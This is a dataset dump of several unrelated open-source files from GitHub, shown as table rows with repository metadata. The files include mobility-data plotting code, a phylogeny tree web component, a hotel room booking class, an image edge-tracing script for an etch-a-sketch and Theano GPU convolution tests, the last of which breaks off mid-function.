max_stars_repo_path (stringlengths 3-269) | max_stars_repo_name (stringlengths 4-119) | max_stars_count (int64 0-191k) | id (stringlengths 1-7) | content (stringlengths 6-1.05M) | score (float64 0.23-5.13) | int_score (int64 0-5) |
---|---|---|---|---|---|---|
NGram/prediction_2104/user_exploration.py | mbc96325/IOHMM-for-individual-mobility-prediction | 1 | 12786251 | import math
import numpy as np
import oyster_reader as oyster
from matplotlib import pyplot as plt
import matplotlib.colors as cl
# import seaborn as sns
def plotInterTripTime(users):
count = 0
dtFreq = np.zeros(60 * 20)
for u in users:
interTripTime = u.getInterTripTime()
for dt in interTripTime:
dtFreq[dt] += 1
count += 1
dtProb = dtFreq * 1.0 / count
plt.figure()
plt.plot(dtProb)
plt.xlim(0, 18)
xticks = [60 * i for i in range(19)]
xlabels = range(19)
plt.xticks(xticks, xlabels)
plt.xlabel("Inter-Trip Time (in hours)")
plt.ylabel("Probability")
plt.show()
def plotInterTripTimeByOrder(users):
count = 0
tFreq = np.zeros((4, 60 * 20))
for u in users:
dailyDict = u.getDailyTrips()
        for day, trips in dailyDict.items():
num_trips = len(trips)
for i in range(1, num_trips):
dt = trips[i].getTime() - trips[i - 1].getTime()
order = min(i - 1, 3)
tFreq[order, dt] += 1.0
count += 1
tProb = tFreq / count
colors = ['r', 'b', 'g', 'c', 'm', 'y', 'k', 'w']
labels = ['1', '2', '3', '4', '5+']
plt.figure(figsize=(14, 7))
    for i in range(1, 5):
plt.plot(tProb[i - 1, :], colors[i] + '-', label=labels[i])
plt.xlim(0, 18)
xticks = [60 * i for i in range(19)]
xlabels = range(19)
plt.xticks(xticks, xlabels)
plt.xlabel("Inter-Trip Time (in hours)")
plt.ylabel("Probability")
plt.legend(loc='upper right')
plt.show()
def plotTripTime(users):
count = 0
tFreq = np.zeros(60 * 27)
for u in users:
tripTime = u.getTripTime()
for dt in tripTime:
tFreq[dt] += 1
count += 1
tProb = tFreq * 1.0 / count
plt.figure()
plt.plot(tProb)
plt.xlim(3, 27)
xticks = [60 * i for i in range(3, 28)]
xlabels = range(3, 28)
plt.xticks(xticks, xlabels)
plt.xlabel("Time of Day")
plt.ylabel("Probability")
plt.show()
def plotTripTimeByOrder(users):
count = 0
tFreq = np.zeros((5, 60 * 27))
for u in users:
dailyDict = u.getDailyTrips()
        for day, trips in dailyDict.items():
num_trips = len(trips)
for i in range(0, num_trips):
order = min(i, 4)
tFreq[order, trips[i].getTime()] += 1.0
count += 1
tProb = tFreq / count
colors = ['r', 'b', 'g', 'c', 'm', 'y', 'k', 'w']
labels = ['1', '2', '3', '4', '5+']
plt.figure(figsize=(14, 7))
    for i in range(5):
plt.plot(tProb[i, :], colors[i] + '-', label=labels[i])
plt.xlim(3, 27)
xticks = [60 * i for i in range(3, 28)]
xlabels = range(3, 28)
plt.xticks(xticks, xlabels)
plt.xlabel("Time of Day")
plt.ylabel("Probability")
plt.legend(loc='upper left')
plt.show()
def plotNumStations(users):
stNum = []
odNum = []
for u in users:
stNum.append(len(u.getStationFreq()))
odNum.append(len(u.getStationFreq(stationType='od')))
plt.figure(figsize=(14, 7))
plt.subplot(121)
plt.hist(stNum, bins=np.linspace(0, 120, 10))
plt.xlim(0, 120)
plt.xlabel('Number of Stations')
plt.ylabel('Frequency')
plt.subplot(122)
plt.plot(stNum, odNum, 'o')
plt.xlabel('Number of Stations')
plt.ylabel('Number of OD Pairs')
plt.show()
def plotStationUsage(users):
n = 20
ranks = range(n + 1)
oRank = []
dRank = []
for user in users:
total = len(user.tripList)
rankedOs = user.getStationRank(stationType='in')
shares = [item[1] * 1.0 / total for item in rankedOs[:n]]
shares = [0] + shares
if len(shares) < (n + 1):
shares = shares + [0] * (n + 1 - len(shares))
dbn = np.cumsum(shares)
oRank.append(dbn)
rankedDs = user.getStationRank(stationType='out')
shares = [item[1] * 1.0 / total for item in rankedDs[:n]]
shares = [0] + shares
if len(shares) < (n + 1):
shares = shares + [0] * (n + 1 - len(shares))
dbn = np.cumsum(shares)
dRank.append(dbn)
plt.figure(figsize=(10, 8))
YO = np.median(np.array(oRank), axis=0)
YD = np.median(np.array(dRank), axis=0)
plt.plot(ranks, YO, c='blue', marker='o', ls='-', label='Entry Station')
plt.plot(ranks, YD, c='red', marker='^', ls='--', label='Exit Station')
plt.xlabel('Top-K Most Used Station', fontsize=16)
plt.ylabel('Proportion (Median)', fontsize=16)
plt.legend(loc='lower right', fontsize=14)
plt.grid()
plt.show()
def mostUsedStations(users):
inProb = []
outProb = []
for u in users:
nDays = u.getActiveDays()
mus = u.getStationRank()[0][0]
inCount = 0
outCount = 0
dailyDict = u.getDailyTrips()
        for day, trips in dailyDict.items():
if trips[0].inStation == mus:
inCount += 1
if trips[-1].outStation == mus:
outCount += 1
inProb.append(inCount * 1.0 / nDays)
outProb.append(outCount * 1.0 / nDays)
    print(np.median(inProb))
    print(np.median(outProb))
def entropy(X):
ent = 0
N = len(X)
labels = set(X)
for label in labels:
prob = float(X.count(label)) / N
if prob > 0:
ent -= prob * math.log(prob, 2)
return ent
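# For reference, entropy() computes the Shannon entropy (in bits) of a list of labels:
# entropy(['A', 'A', 'B', 'B']) == 1.0, while entropy(['A', 'A', 'A', 'A']) == 0.0.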
def gridPlot(users):
stNum = []
n = 20
ranks = range(n + 1)
oRank = []
dRank = []
count = 0
tFreq = np.zeros(2 * 27)
oEnt = []
dEnt = []
tEnt = []
for u in users:
stNum.append(len(set(u.getStationFreq())))
total = len(u.tripList)
rankedOs = u.getStationRank(stationType='in')
oShares = [item[1] * 1.0 / total for item in rankedOs[:n]]
if len(oShares) < n:
oShares = oShares + [0] * (n - len(oShares))
oRank.append(oShares)
rankedDs = u.getStationRank(stationType='out')
dShares = [item[1] * 1.0 / total for item in rankedDs[:n]]
if len(dShares) < n:
dShares = dShares + [0] * (n - len(dShares))
dRank.append(dShares)
tripTime = u.getDiscreteTripTime()
for dt in tripTime:
tFreq[dt] += 1
count += 1
oEnt.append(entropy(u.getStationList(stationType='in')))
dEnt.append(entropy(u.getStationList(stationType='out')))
tEnt.append(entropy(u.getDiscreteTripTime()))
plt.figure(figsize=(14, 14))
ax1 = plt.subplot(221)
plt.hist(stNum, bins=np.linspace(0, 120, 10))
plt.xlim(0, 120)
plt.xlabel('Number of Stations (used in a Year)')
plt.ylabel('Frequency')
plt.text(-0.15, 1, '(a)', fontdict={'size': 16, 'weight': 'bold'},
transform=ax1.transAxes)
ax2 = plt.subplot(222)
YO = np.median(np.array(oRank), axis=0)
YD = np.median(np.array(dRank), axis=0)
plt.plot(ranks[1:], YO, c='blue', marker='o', ls='-', label='Entry Station')
plt.plot(ranks[1:], YD, c='red', marker='^', ls='--', label='Exit Station')
plt.xlabel('The K-th Most Used Station')
plt.ylabel('Proportion (Median)')
plt.legend(loc='upper right', fontsize=12)
plt.text(-0.15, 1, '(b)', fontdict={'size': 16, 'weight': 'bold'},
transform=ax2.transAxes)
ax3 = plt.subplot(223)
tProb = tFreq * 1.0 / count
plt.plot(tProb, 'k-')
plt.xlim(3 * 2, 26 * 2)
xticks = [i for i in range(3 * 2, 26 * 2, 2)]
xlabels = range(3, 26)
plt.xticks(xticks, xlabels)
plt.xlabel("Hour of Day")
plt.ylabel("Probability")
plt.text(-0.15, 1, '(c)', fontdict={'size': 16, 'weight': 'bold'},
transform=ax3.transAxes)
ax4 = plt.subplot(224)
left = range(1, 4)
height = [np.median(tEnt), np.median(oEnt), np.median(dEnt)]
plt.bar(left, height, align='center', color=['k', 'b', 'r'])
xticks = range(1, 4)
xlabels = ['Time', 'Entry Station', 'Exit Station']
plt.xticks(xticks, xlabels)
plt.ylabel("Entropy")
plt.text(-0.15, 1, '(d)', fontdict={'size': 16, 'weight': 'bold'},
transform=ax4.transAxes)
plt.show()
def plotTripRate(users):
userDays = 0
trips = 0
tRate = []
for u in users:
total = len(u.tripList)
days = u.getActiveDays()
tRate.append(total * 1.0 / days)
userDays += days
trips += total
    print(userDays, trips)
plt.hist(tRate)
plt.show()
def plotActiveDays(users):
sortedUsers = sorted(users, key=lambda t: t.getActiveDays(), reverse=True)
vector = np.array([u.getActiveDayVector() for u in sortedUsers])
fig, ax = plt.subplots(figsize=(9, 3))
norm = cl.Normalize(vmin=0, vmax=1)
im = ax.imshow(vector.T, interpolation='nearest', cmap='hot')
# ax.set_aspect(1. / ax.get_data_ratio())
ax.set_xlabel('User')
ax.set_ylabel('Day')
plt.show()
def plotInterActiveDays(users):
activeD = []
deltaD = []
for u in users:
activeD.append(u.getActiveDays())
deltaD.extend(u.getInterActiveDays())
fig, axes = plt.subplots(figsize=(10, 5))
plt.subplot(121)
    plt.hist(activeD, bins=range(60, 361, 15), density=True)
plt.xlabel('Number of Active Days')
plt.ylabel('Probability (User)')
plt.subplot(122)
    plt.hist(np.array(deltaD) - 1, bins=range(0, 20, 1), density=True)
plt.xlabel('Number of Days between Active Days')
plt.ylabel('Probability (User Day)')
plt.show()
if __name__ == "__main__":
dataFile = "/Volumes/MobilitySyntax/data/sampleData_2013_reduced.csv"
vocabFile = "/Volumes/MobilitySyntax/data/station_vocab.csv"
users = oyster.readPanelData(dataFile, vocabFile)
    users = [u for u in users if u.getActiveDays() > 60]  # call the method; comparing the bound method object to 60 was a bug
# plotNumStations(users)
# plotInterTripTimeByOrder(users)
# plotTripTimeByOrder(users)
# plotStationUsage(users)
# mostUsedStations(users)
# gridPlot(users)
# plotTripRate(users)
# plotActiveDays(users)
plotInterActiveDays(users)
| 2.703125 | 3 |
src/clld_phylogeny_plugin/tree.py | clld/clld-phylogeny-plugin | 1 | 12786252 | <reponame>clld/clld-phylogeny-plugin<gh_stars>1-10
import operator
import itertools
import collections
from zope.interface import implementer
from sqlalchemy.orm import joinedload
from clldutils.misc import lazyproperty
from clld.db.meta import DBSession
from clld.db.models.common import Parameter, ValueSet
from clld.web.util.component import Component
from clld.web.util.htmllib import HTML
from clld.web.util.helpers import link, map_marker_img
import ete3
from ete3.coretype.tree import TreeError
from clld_phylogeny_plugin.interfaces import ITree
def all_equal(iterator, op=operator.eq):
iterator = iter(iterator)
try:
first = next(iterator)
except StopIteration:
return True
return all(op(first, rest) for rest in iterator)
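# For example, all_equal([1, 1, 1]) is True, all_equal([1, 2]) is False,
# and an empty iterator is treated as all equal.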
@implementer(ITree)
class Tree(Component):
"""Represents the configuration for a leaflet map."""
__template__ = 'clld_phylogeny_plugin:templates/tree.mako'
def __init__(self, ctx, req, eid='tree'):
"""Initialize.
:param ctx: context object of the current request.
:param req: current pyramid request object.
:param eid: Page-unique DOM-node ID.
"""
self.req = req
self.ctx = ctx
self.eid = eid
@lazyproperty
def parameters(self):
pids = []
if 'parameter' in self.req.params:
pids = self.req.params.getall('parameter')
elif 'parameters' in self.req.params:
pids = self.req.params['parameters'].split(',')
if pids:
return DBSession.query(Parameter)\
.filter(Parameter.id.in_(pids))\
.options(
joinedload(Parameter.valuesets).joinedload(ValueSet.values),
joinedload(Parameter.domain))\
.all()
return []
@lazyproperty
def domains(self):
return [
collections.OrderedDict([(de.pk, de) for de in p.domain])
for p in self.parameters]
@lazyproperty
def newick(self):
if self.parameters:
t = ete3.Tree(self.ctx.newick, format=1)
nodes = set(n for n in self.labelSpec.keys())
try:
t.prune(
nodes.intersection(set(n.name for n in t.traverse())),
preserve_branch_length=True)
except TreeError:
return
return t.write(format=1)
return self.ctx.newick
def get_label_properties(self, label, pindex=None):
res = {
'eid': 'tlpk{0}-{1}'.format(label, pindex),
'shape': 'c',
'color': '#ff6600',
'conflict': False,
'tooltip_title': 'Related {0}'.format(self.req.translate('Languages')),
}
if pindex is not None:
parameter = self.parameters[pindex]
domain = self.domains[pindex]
language2valueset = {
k: v[pindex] for k, v in self.language2valueset.items() if v[pindex]}
def vname(v):
return domain[v.domainelement_pk].name if v.domainelement_pk else v.name
def comp(a, b):
if parameter.domain:
return a.domainelement_pk == b.domainelement_pk
return a.name == b.name
values = list(itertools.chain(*[
language2valueset[l.pk].values for l in label.languages
if l.pk in language2valueset]))
if not values:
res['tooltip_title'] = 'Missing data'
res['tooltip'] = None
res['shape'] = 's'
res['color'] = '#fff'
else:
res['conflict'] = not all_equal(values, op=comp)
if not res['conflict']:
res['tooltip_title'] = '{0}: {1}'.format(
values[0].valueset.parameter.id, vname(values[0]))
lis = [
HTML.li(link(self.req, l)) for l in label.languages
if l.pk in language2valueset]
else:
res['tooltip_title'] = '{0}'.format(values[0].valueset.parameter.id)
lis = []
for v in values:
lis.append(HTML.li(
map_marker_img(
self.req, domain[v.domainelement_pk]
if v.domainelement_pk else v),
'{0}: '.format(vname(v)),
link(self.req, v.valueset.language)))
res['tooltip'] = HTML.ul(*lis, class_='unstyled')
for lang in label.languages:
if lang.pk in language2valueset:
res['shape'], res['color'] = self.get_marker(
language2valueset[lang.pk])
break
else:
res['tooltip'] = HTML.ul(
*[HTML.li(link(self.req, l)) for l in label.languages])
return res
@staticmethod
def head(req):
return '\n'.join(
"{0}".format(e) for e in [
HTML.link(
rel="stylesheet",
href=req.static_url('clld_phylogeny_plugin:static/phylotree.css')),
HTML.script(
src="https://d3js.org/d3.v3.min.js"),
HTML.script(
src="https://cdnjs.cloudflare.com/ajax/libs/underscore.js/1.8.3/"
"underscore-min.js",
charset="utf-8"),
HTML.script(
type="text/javascript",
src=req.static_url('clld_phylogeny_plugin:static/phylotree.js')),
HTML.script(
type="text/javascript",
src=req.static_url(
'clld_phylogeny_plugin:static/clld_phylogeny_plugin.js')),
])
@lazyproperty
def language2valueset(self):
if self.parameters:
res = collections.defaultdict(lambda: [None] * len(self.parameters))
for i, param in enumerate(self.parameters):
for vs in param.valuesets:
res[vs.language_pk][i] = vs
return res
@lazyproperty
def labelSpec(self):
if self.parameters:
return {
l.name: [self.get_label_properties(l, i)
for i in range(len(self.parameters))]
for l in self.ctx.treelabels
if any(lang.pk in self.language2valueset for lang in l.languages)}
return {
l.name: [self.get_label_properties(l)]
for l in self.ctx.treelabels if l.languages}
def get_default_options(self):
return {
'reroot': False,
'brush': False,
'align-tips': True,
'show-scale': False
}
def get_marker(self, valueset):
if valueset.values:
val = valueset.values[0]
if val.domainelement and val.domainelement.jsondatadict.get('icon'):
icon = val.domainelement.jsondatadict.get('icon')
return icon[:1], '#' + icon[1:]
return 'c', '#ff6600'
| 2.21875 | 2 |
nari/types/event/addcombatant.py | lunarrize/nari | 9 | 12786253 | <gh_stars>1-10
"""Event representing an actor being added to the field"""
from nari.types.event.base import Event
from nari.types.event import Type
from nari.types.actor import Actor
class AddCombatant(Event):
"""Adding an actor to the field"""
__id__ = Type.addcombatant.value
def handle_params(self):
self.actor = Actor(self.params[0], self.params[1])
def __repr__(self):
return f'<AddCombatant ({self.actor})>'
| 2.34375 | 2 |
room.py | benjy8/Hotel-booking | 0 | 12786254 | import datetime
'''
room.py
'''
# declare constants
MONTHS = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']
DAYS_PER_MONTH = [31,28,31,30,31,30,31,31,30,31,30,31]
#class Room
class Room:
#class attributes
TYPES_OF_ROOM_AVAILABLE = ['twin','double','queen','king']
#instance attributes
def __init__(self, rType, rNum, rPricePerNight):
# check if the room is available
if rType.lower() in (rT.lower() for rT in Room.TYPES_OF_ROOM_AVAILABLE):
self.room_type = rType
else:
raise AssertionError("Room type not available")
# check if the room number is positive
if rNum > 0:
self.room_num = rNum
else:
raise AssertionError("Room number should be positive")
# check if the room price is positive
if rPricePerNight > 0:
self.price = rPricePerNight
else:
raise AssertionError("Price should be positive")
# initialize the empty dictionary
self.availability = {}
# string representation of room
def __str__(self):
return "Room " +str(self.room_num) + "," +self.room_type +"," +str(self.price)
    '''
    :param monthList: list of month name abbreviations (e.g. 'Jan') to set up
    :param yearInt: integer representing the year
    Updates the availability of the room for the given months.
    '''
def set_up_room_availability(self, monthList, yearInt):
        # A year is a leap year if it is divisible by 4, except for century years,
        # which must also be divisible by 400 (e.g. 2000 is a leap year, 1900 is not).
        isleap = (yearInt % 4 == 0) and (yearInt % 100 != 0 or yearInt % 400 == 0)
# loop through all the given months
for month in monthList:
# find the index of month in the MONTHS array
monthIndex = MONTHS.index(month)
# create tuple of integers
monthTuple = (yearInt, monthIndex+1)
# create a empty list to hold booleans
days = []
# first element is None
days.append(None)
numDays = DAYS_PER_MONTH[monthIndex]
# if year is leap year, feb should have 29 days
if monthIndex == 1 and isleap:
numDays = 29
# loop through the number of days
for day in range(numDays):
days.append(True)
# update the availability dictionary
self.availability[monthTuple] = days
def reserve_room(self, reserveDate):
if not self.availability[(reserveDate.year, reserveDate.month)][reserveDate.day]:
raise AssertionError("The room is not available at the given date")
self.availability[(reserveDate.year, reserveDate.month)][reserveDate.day] = False
def make_available(self, reserveDate):
self.availability[(reserveDate.year, reserveDate.month)][reserveDate.day] = True
def is_available(self, checkIn, checkOut):
if checkIn > checkOut:
raise AssertionError("Check-out date is earlier than check-ins")
for year in range(checkIn.year, checkOut.year+1):
if checkIn.month <= checkOut.month:
for month in range(checkIn.month, checkOut.month+1):
for day in range(1, DAYS_PER_MONTH[month-1]):
if month == checkIn.month and day >= checkIn.day and not self.availability[(year,month)][day]:
return False
if month == checkOut.month and day < checkOut.day and not self.availability[(year,month)][day]:
return False
if month != checkIn.month and month != checkOut.month and not self.availability[(year,month)][day]:
return False
else:
if year == checkIn.year:
months = list(range(checkIn.month,13))
elif year == checkOut.year:
months = list(range(1,checkOut.month+1))
else:
                    months = range(1, 13)  # a full year lies between the check-in and check-out years
for month in months:
for day in range(1,DAYS_PER_MONTH[month-1]):
if month == checkIn.month and day >= checkIn.day and not self.availability[(year,month)][day]:
return False
if month == checkOut.month and day < checkOut.day and not self.availability[(year,month)][day]:
return False
if month != checkIn.month and month != checkOut.month and not self.availability[(year,month)][day]:
return False
return True
@staticmethod
def find_available_room(rooms, roomType, checkIn, checkOut):
if checkIn > checkOut:
raise AssertionError("Check-out date is earlier than check-ins")
temp_rooms = [room for room in rooms if room.room_type == roomType]
for room in temp_rooms:
if room.is_available(checkIn, checkOut):
return room
return None
if __name__ == '__main__':
r = Room("Queen", 105, 80.0)
r.set_up_room_availability(['Jan', 'Dec'], 2019)
print(len(r.availability))
    print(len(r.availability[(2019, 12)]))
    print(r.availability[(2019, 12)][5])
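    # A minimal sketch of the availability helpers (these dates are illustrative):
    # check_in = datetime.date(2019, 1, 10)
    # check_out = datetime.date(2019, 1, 12)
    # print(r.is_available(check_in, check_out))
    # print(Room.find_available_room([r], "Queen", check_in, check_out))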
| 3.609375 | 4 |
juno/onboarding.py | ASG09/juno-python | 7 | 12786255 | from juno.resources import handler_request
from juno.resources.routes import onboarding_routes
def account_new_onboarding_request(dictionary):
return handler_request.post(onboarding_routes.get_base_url(), dictionary) | 1.828125 | 2 |
python/tests/protocol1_0/image.py | wnetz/etch-a-sketch | 0 | 12786256 | import sys
import cv2
from matplotlib import pyplot as plt
from skimage.filters import sobel
import numpy as np
import math
from Etch import Etch
PRINT_ETCH = True
class Image:
def __init__(self):
self.points = []
self.image = cv2.imread("C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/tri.png", 0)
self.imageShape = 0
self.etch = Etch()
self.sourceFile = open('C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/test.txt', 'w')
self.sourceFile2 = open('C:/Users/wnetz/Documents/etch-a-sketch/python/tests/protocol1_0/test2.txt', 'w')
np.set_printoptions(threshold=sys.maxsize)
def processImage(self):
self.imageShape = self.image.shape
sig = .3
median = np.median(self.image)
lower = int(max(0,(1.0-sig)*median))
upper = int(min(255,(1.0+sig)*median))
self.image = cv2.Canny(self.image,lower,upper)
plt.imshow(self.image, cmap='gray')
plt.show()
def sort(self):
#loop x
for x in range(self.imageShape[0]):
#loop y
for y in range(self.imageShape[1]):
#if there is an edge pixle
if self.image[x][y] == 255:
point = (((x -self.imageShape[1] + 1) * -1) * 18000/self.imageShape[1], y * 12000/self.imageShape[0])
self.points.append(point)
#print ("("+str(point[0]) + "," + str(point[1])+")")
print("X",end='',file = self.sourceFile)
else:
print(" ",end='',file = self.sourceFile)
print("",file = self.sourceFile)
print(len(self.points))
def drawImage(self):
avg = 0
numpoints = 0
minpoint = [0,0]
length = len(self.points)
while len(self.points) > 1:
oldmin = minpoint
min = math.pow(math.pow(18000,2) + math.pow(12000,2),.5)
minpoint = []
lessmin = []
for point in self.points:
dist = math.pow(math.pow(point[0]-oldmin[0],2) + math.pow(point[1]-oldmin[1],2),.5)
if min < dist and dist < 100:
lessmin.append(point)
if dist < min:
min = dist
minpoint = point
#if min < 3:
#break
if len(minpoint) > 0:
print(str(min) + " (" + str(minpoint[0]) + "," + str(minpoint[1]) + ")", file = self.sourceFile2)
if min > 1:
avg = avg + min
numpoints = numpoints + 1
for point in lessmin:
self.points.remove(point)
if len(minpoint) > 0:
self.points.remove(minpoint)
self.etch.goto(minpoint[0],minpoint[1],PRINT_ETCH)
if len(self.points) % 1000 == 0:
print(len(self.points))
print(str(min) + " (" + str(minpoint) + ") ",len(self.points))
print("total " + str(avg) + " " + str(numpoints))
print("total " + str(avg/numpoints))
def end(self):
self.sourceFile.close()
self.sourceFile2.close()
self.etch.goto(0,0,PRINT_ETCH)
image = Image()
#print("enter image path")
#print(input())
image.processImage()
image.sort()
image.drawImage()
image.end()
| 2.828125 | 3 |
microPython/lib/microCoAPy/reading.py | renzoe/IANVS | 2 | 12786257 | <filename>microPython/lib/microCoAPy/reading.py<gh_stars>1-10
class Reading:
# Period is the index in the array
def __init__(self, attack):
self.attack = attack | 2.375 | 2 |
theano/sandbox/cuda/tests/test_abstractconv.py | aalmah/Theano | 0 | 12786258 | <filename>theano/sandbox/cuda/tests/test_abstractconv.py<gh_stars>0
import unittest
import numpy
import itertools
import theano
from theano.tests import unittest_tools as utt
import theano.tensor.nnet.abstract_conv2d as conv
from theano.sandbox.cuda import float32_shared_constructor as gpu_shared
from theano.compile import shared as cpu_shared
from theano.sandbox.cuda.dnn import dnn_available, dnn_conv, dnn_gradweight, dnn_gradinput
from nose.plugins.skip import SkipTest
import theano.sandbox.cuda as cuda
if not cuda.cuda_available:
raise SkipTest('Optional package cuda disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_gpu = theano.compile.mode.get_mode('FAST_RUN').including('gpu')
mode_without_gpu = theano.compile.mode.get_mode('FAST_RUN').excluding('gpu')
else:
mode_with_gpu = theano.compile.mode.get_default_mode().including('gpu')
mode_without_gpu = theano.compile.get_default_mode().excluding('gpu')
class TestConv2d(unittest.TestCase):
def setUp(self):
super(TestConv2d, self).setUp()
self.inputs_shapes = [(8, 1, 12, 12), (8, 1, 18, 18), (2, 1, 4, 4),
(6, 1, 10, 11), (2, 1, 6, 5), (1, 5, 9, 9)]
self.filters_shapes = [(5, 1, 2, 2), (4, 1, 3, 3), (2, 1, 3, 3),
(1, 1, 2, 5), (4, 1, 2, 2), (4, 5, 2, 2)]
self.subsamples = [(1, 1), (2, 2), (2, 4)]
self.border_modes = ["valid", "full", (0, 0), (1, 1), (5, 5), (5, 2)]
self.filter_flip = [True, False]
def get_output_shape(self, inputs_shape, filters_shape, subsample, border_mode):
if border_mode == "valid":
border_mode = (0, 0)
if border_mode == "full":
border_mode = (filters_shape[2] - 1, filters_shape[3] - 1)
batch_size = inputs_shape[0]
num_filters = filters_shape[0]
return (batch_size, num_filters,) \
+ tuple(None if i is None or k is None
else ((i + 2 * pad - k) // d + 1)
for i, k, d, pad in zip(inputs_shape[2:], filters_shape[2:],
subsample, border_mode))
def run_fwd(self, inputs_shape, filters_shape, ref=dnn_conv,
subsample=(1, 1), verify_grad=True, mode=mode_without_gpu,
border_mode='valid', filter_flip=True, device='cpu', provide_shape=False):
inputs_val = numpy.random.random(inputs_shape).astype('float32')
filters_val = numpy.random.random(filters_shape).astype('float32')
if device == 'gpu':
inputs = gpu_shared(inputs_val)
filters = gpu_shared(filters_val)
else:
inputs = theano.tensor.as_tensor_variable(cpu_shared(inputs_val))
filters = theano.tensor.as_tensor_variable(cpu_shared(filters_val))
if provide_shape:
imshp = inputs_shape
kshp = filters_shape
else:
imshp = None
kshp = None
if filter_flip:
conv_mode = 'conv'
else:
conv_mode = 'cross'
c_ref = ref(inputs, filters,
border_mode=border_mode,
subsample=subsample,
conv_mode=conv_mode)
c = conv.conv2d(inputs, filters,
border_mode=border_mode,
subsample=subsample,
filter_flip=filter_flip,
input_shape=imshp,
filter_shape=kshp)
f_ref = theano.function([], c_ref, mode=mode)
f = theano.function([], c, mode)
res_ref = numpy.array(f_ref())
res = numpy.array(f())
utt.assert_allclose(res_ref, res)
if verify_grad:
utt.verify_grad(conv.AbstractConv2d(border_mode="valid", imshp=imshp, kshp=kshp,
subsample=subsample),
[inputs_val, filters_val],
mode=mode)
def run_gradweight(self, inputs_shape, filters_shape, output_shape,
ref=dnn_gradweight, subsample=(1, 1), filter_flip=True,
verify_grad=True, mode=mode_without_gpu, border_mode='valid',
device='cpu', provide_shape=False):
inputs_val = numpy.random.random(inputs_shape).astype('float32')
output_val = numpy.random.random(output_shape).astype('float32')
if device == 'gpu':
inputs = gpu_shared(inputs_val)
output = gpu_shared(output_val)
else:
inputs = theano.tensor.as_tensor_variable(cpu_shared(inputs_val))
output = theano.tensor.as_tensor_variable(cpu_shared(output_val))
if provide_shape:
imshp = inputs_shape
kshp = filters_shape
else:
imshp = None
kshp = None
if filter_flip:
conv_mode = 'conv'
else:
conv_mode = 'cross'
c = conv.AbstractConv2d_gradWeights(border_mode=border_mode,
filter_flip=filter_flip,
subsample=subsample,
imshp=imshp, kshp=kshp)
c = c(inputs, output, filters_shape[-2:])
c_ref = ref(inputs, output,
filters_shape,
border_mode=border_mode,
subsample=subsample,
conv_mode=conv_mode)
f = theano.function([], c, mode)
f_ref = theano.function([], c_ref, mode)
res_ref = numpy.array(f_ref())
res = numpy.array(f())
utt.assert_allclose(res_ref, res)
def abstract_conv2d_gradweight(inputs_val, output_val):
conv_op = conv.AbstractConv2d_gradWeights(border_mode=border_mode, subsample=subsample)
return conv_op(inputs_val, output_val, filters_shape[-2:])
if verify_grad:
utt.verify_grad(abstract_conv2d_gradweight, [inputs_val, output_val],
mode=mode, eps=1)
def run_gradinput(self, inputs_shape, filters_shape, output_shape, ref=dnn_gradinput,
subsample=(1, 1), filter_flip=True, verify_grad=True, mode=mode_without_gpu,
border_mode='valid', device='cpu', provide_shape=False):
output_val = numpy.random.random(output_shape).astype('float32')
filters_val = numpy.random.random(filters_shape).astype('float32')
if device == 'gpu':
output = gpu_shared(output_val)
filters = gpu_shared(filters_val)
else:
output = theano.tensor.as_tensor_variable(cpu_shared(output_val))
filters = theano.tensor.as_tensor_variable(cpu_shared(filters_val))
if provide_shape:
imshp = inputs_shape
kshp = filters_shape
else:
imshp = None
kshp = None
if filter_flip:
conv_mode = 'conv'
else:
conv_mode = 'cross'
c = conv.AbstractConv2d_gradInputs(border_mode=border_mode,
subsample=subsample,
filter_flip=filter_flip,
imshp=imshp, kshp=kshp)
c = c(filters, output, inputs_shape[-2:])
c_ref = ref(filters, output, inputs_shape,
border_mode=border_mode, subsample=subsample,
conv_mode=conv_mode)
f = theano.function([], c, mode)
f_ref = theano.function([], c_ref, mode)
res_ref = numpy.array(f_ref())
res = numpy.array(f())
utt.assert_allclose(res_ref, res)
def abstract_conv2d_gradinputs(filters_val, output_val):
conv_op = conv.AbstractConv2d_gradInputs(border_mode=border_mode, subsample=subsample)
return conv_op(filters_val, output_val, inputs_shape[-2:])
if verify_grad:
utt.verify_grad(abstract_conv2d_gradinputs, [filters_val, output_val],
mode=mode, eps=1)
def test_dnn_conv(self):
if not dnn_available():
raise SkipTest(cuda.dnn.dnn_available.msg)
mode = mode_with_gpu
# provide_shape is not used by the CuDNN impementation
provide_shape = False
for (i, f), s, b, flip in itertools.product(
zip(self.inputs_shapes, self.filters_shapes),
self.subsamples,
self.border_modes,
self.filter_flip):
o = self.get_output_shape(i, f, s, b)
self.run_fwd(inputs_shape=i, filters_shape=f, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
def test_cormm_conv(self):
if not dnn_available():
raise SkipTest(cuda.dnn.dnn_available.msg)
mode = mode_with_gpu.excluding('cudnn')
for (i, f), s, b, flip, provide_shape in itertools.product(
zip(self.inputs_shapes, self.filters_shapes),
self.subsamples,
self.border_modes,
self.filter_flip,
[False, True]):
o = self.get_output_shape(i, f, s, b)
self.run_fwd(inputs_shape=i, filters_shape=f, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
self.run_gradweight(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
self.run_gradinput(inputs_shape=i, filters_shape=f,
output_shape=o, subsample=s,
verify_grad=True, mode=mode, device='gpu',
provide_shape=provide_shape, border_mode=b,
filter_flip=flip)
def test_cpu_conv(self):
if not dnn_available():
raise SkipTest(cuda.dnn.dnn_available.msg)
mode = mode_without_gpu
for (i, f), s, b, flip, provide_shape in itertools.product(
zip(self.inputs_shapes, self.filters_shapes),
self.subsamples,
self.border_modes,
self.filter_flip,
[False, True]):
o = self.get_output_shape(i, f, s, b)
fwd_OK = True
gradweight_OK = True
gradinput_OK = True
if not flip:
fwd_OK = False
